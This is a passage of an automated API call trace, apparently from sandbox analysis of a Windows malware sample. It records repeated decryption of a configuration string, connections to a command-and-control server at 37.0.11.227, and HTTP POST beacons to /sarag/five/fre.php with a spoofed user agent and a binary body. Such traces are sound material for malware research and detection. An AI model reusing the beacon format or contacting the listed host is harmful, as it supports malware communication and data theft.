(in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0313.157] GetProcessHeap () returned 0x690000 [0313.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0313.157] GetProcessHeap () returned 0x690000 [0313.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0313.157] GetProcessHeap () returned 0x690000 [0313.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0313.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1684) returned 0xa9c [0313.161] Sleep (dwMilliseconds=0xea60) [0313.162] GetProcessHeap () returned 0x690000 [0313.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0313.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.164] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0313.175] GetProcessHeap () returned 0x690000 [0313.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0313.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.176] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0313.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.177] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.178] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.178] GetProcessHeap () returned 0x690000 [0313.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0313.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.179] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0313.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.180] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0313.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.181] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0313.181] GetProcessHeap () returned 0x690000 [0313.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0313.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.182] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.183] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.183] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.185] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.185] GetProcessHeap () returned 0x690000 [0313.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0313.185] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0313.185] GetProcessHeap () returned 0x690000 [0313.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0313.185] GetProcessHeap () returned 0x690000 [0313.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0313.186] GetProcessHeap () returned 0x690000 [0313.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0313.186] GetProcessHeap () returned 0x690000 [0313.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0313.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.192] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0313.198] GetProcessHeap () returned 0x690000 [0313.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0313.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.199] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0313.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.200] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.201] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.201] GetProcessHeap () returned 0x690000 [0313.202] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0313.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.203] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0313.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.204] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0313.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.205] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0313.205] GetProcessHeap () returned 0x690000 [0313.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0313.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.206] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0313.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.207] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0313.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.215] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0313.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.217] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0313.217] GetProcessHeap () returned 0x690000 [0313.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0313.217] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0313.217] GetProcessHeap () returned 0x690000 [0313.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0313.217] socket (af=2, type=1, protocol=6) returned 0xaa0 [0313.217] connect (s=0xaa0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0313.246] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0313.246] GetProcessHeap () returned 0x690000 [0313.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0313.246] GetProcessHeap () returned 0x690000 [0313.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0313.247] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0313.248] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.248] GetProcessHeap () returned 0x690000 [0313.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0313.248] GetProcessHeap () returned 0x690000 [0313.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0313.248] GetProcessHeap () returned 0x690000 [0313.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0313.249] GetProcessHeap () returned 0x690000 [0313.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0313.249] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0313.250] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.250] GetProcessHeap () returned 0x690000 [0313.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0313.250] GetProcessHeap () returned 0x690000 [0313.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0313.250] send (s=0xaa0, buf=0x6ad508*, len=242, flags=0) returned 242 [0313.251] send (s=0xaa0, buf=0x6aba40*, len=159, flags=0) returned 159 [0313.251] GetProcessHeap () returned 0x690000 [0313.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0313.251] recv (in: s=0xaa0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0313.324] GetProcessHeap () returned 0x690000 [0313.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0313.325] GetProcessHeap () returned 0x690000 [0313.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0313.326] GetProcessHeap () returned 0x690000 [0313.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0313.327] GetProcessHeap () returned 0x690000 [0313.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0313.327] closesocket (s=0xaa0) returned 0 [0313.328] GetProcessHeap () returned 0x690000 [0313.328] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0313.328] GetProcessHeap () returned 0x690000 [0313.328] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0313.329] GetProcessHeap () returned 0x690000 [0313.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0313.329] GetProcessHeap () returned 0x690000 [0313.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0313.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1680) returned 0xaa0 [0313.332] Sleep (dwMilliseconds=0xea60) [0313.333] GetProcessHeap () returned 0x690000 [0313.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0313.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.335] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0313.354] GetProcessHeap () returned 0x690000 [0313.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0313.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.355] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0313.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.356] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.357] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.357] GetProcessHeap () returned 0x690000 [0313.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0313.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.362] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0313.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.363] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0313.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.364] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0313.364] GetProcessHeap () returned 0x690000 [0313.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0313.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.365] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.366] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.367] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.368] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.368] GetProcessHeap () returned 0x690000 [0313.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0313.368] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0313.368] GetProcessHeap () returned 0x690000 [0313.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0313.371] GetProcessHeap () returned 0x690000 [0313.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0313.371] GetProcessHeap () returned 0x690000 [0313.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0313.372] GetProcessHeap () returned 0x690000 [0313.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0313.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.377] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0313.384] GetProcessHeap () returned 0x690000 [0313.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0313.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.385] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0313.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.386] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.387] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.387] GetProcessHeap () returned 0x690000 [0313.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0313.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.391] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0313.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.392] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0313.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.393] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0313.393] GetProcessHeap () returned 0x690000 [0313.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0313.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.394] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0313.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.395] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0313.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.396] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0313.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.397] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0313.397] GetProcessHeap () returned 0x690000 [0313.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0313.397] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0313.397] GetProcessHeap () returned 0x690000 [0313.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0313.397] socket (af=2, type=1, protocol=6) returned 0xaa4 [0313.398] connect (s=0xaa4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0313.422] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0313.422] GetProcessHeap () returned 0x690000 [0313.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0313.422] GetProcessHeap () returned 0x690000 [0313.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0313.423] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0313.426] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.426] GetProcessHeap () returned 0x690000 [0313.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0313.426] GetProcessHeap () returned 0x690000 [0313.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0313.427] GetProcessHeap () returned 0x690000 [0313.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0313.427] GetProcessHeap () returned 0x690000 [0313.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0313.427] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0313.428] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.428] GetProcessHeap () returned 0x690000 [0313.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0313.428] GetProcessHeap () returned 0x690000 [0313.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0313.429] send (s=0xaa4, buf=0x6ad508*, len=242, flags=0) returned 242 [0313.430] send (s=0xaa4, buf=0x6aba40*, len=159, flags=0) returned 159 [0313.430] GetProcessHeap () returned 0x690000 [0313.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0313.430] recv (in: s=0xaa4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0313.522] GetProcessHeap () returned 0x690000 [0313.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0313.522] GetProcessHeap () returned 0x690000 [0313.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0313.523] GetProcessHeap () returned 0x690000 [0313.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0313.524] GetProcessHeap () returned 0x690000 [0313.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0313.524] closesocket (s=0xaa4) returned 0 [0313.524] GetProcessHeap () returned 0x690000 [0313.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0313.524] GetProcessHeap () returned 0x690000 [0313.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0313.525] GetProcessHeap () returned 0x690000 [0313.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0313.525] GetProcessHeap () returned 0x690000 [0313.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0313.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1678) returned 0xaa4 [0313.527] Sleep (dwMilliseconds=0xea60) [0313.530] GetProcessHeap () returned 0x690000 [0313.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0313.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0313.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 